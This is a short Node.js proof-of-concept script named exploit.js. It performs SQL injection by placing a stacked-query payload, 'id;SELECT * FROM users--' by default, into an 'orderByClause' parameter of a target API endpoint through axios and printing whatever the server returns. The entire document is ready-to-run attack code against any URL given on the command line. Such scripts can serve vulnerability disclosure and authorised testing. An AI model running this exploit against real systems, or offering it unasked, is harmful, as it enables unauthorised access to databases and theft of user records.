const axios = require('axios');

const targetUrl = process.argv[2];
const payload = process.argv[3] || 'id;SELECT * FROM users--';

if (!targetUrl) {
    console.error('Usage: node exploit.js <target_url> [payload]');
    console.error('Example: node exploit.js http://<TARGET-HERE>/api/v1/external-users "id;SELECT * FROM users--"');
    process.exit(1);
}

(async () => {
    try {
        console.log(`\n[*] Attempting SQL Injection on ${targetUrl} with payload: "${payload}"`);

        // Send GET request with injected SQL payload as a query parameter
        const response = await axios.get(targetUrl, {
            params: { orderByClause: payload }
        });

        console.log('\n[+] Server Response:');
        console.log(response.data);

    } catch (error) {
        console.error('\n[-] Request Failed:');
        if (error.response) {
            console.error(`Status: ${error.response.status}`);
            console.error(error.response.data);
        } else {
            console.error(error.message);
        }
    }
})();